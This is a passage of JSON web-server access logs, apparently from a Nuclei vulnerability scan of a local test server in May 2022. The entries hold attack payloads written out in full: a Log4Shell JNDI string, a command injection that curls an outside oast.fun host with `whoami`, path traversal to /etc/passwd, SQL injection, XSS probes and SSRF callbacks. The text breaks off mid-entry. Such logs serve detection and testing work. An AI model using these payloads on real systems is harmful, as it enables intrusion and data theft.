HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.c9v8h88smpv8c1ig07h0648zm1ppb3wiu.oast.fun}"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actions/authenticate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /showfile.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"{\x0D\x0A \x22user_login\x22:\x22297MTrYb5se1n3apCrCEIwwrXcq\x22,\x0D\x0A \x22password\x22:\x22297MTrYb5se1n3apCrCEIwwrXcq\x22,\x0D\x0A \x22user_name\x22:\x22297MTrYb5se1n3apCrCEIwwrXcq\x22,\x0D\x0A \x22user_email\x22:\x22297MTrYb5se1n3apCrCEIwwrXcq@example.com\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-json/buddypress/v1/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%3B/monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://c9v8h88smpv8c1ig07h09k9iqq5wb7rz5.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"1.186","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/networking/get_netcfg.php?iface=;curl%20http://c9v8h88smpv8c1ig07h03tuiiyqz9ydgg.oast.fun/`whoami`; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?/Ajax/&q[]=/0/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m_login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) 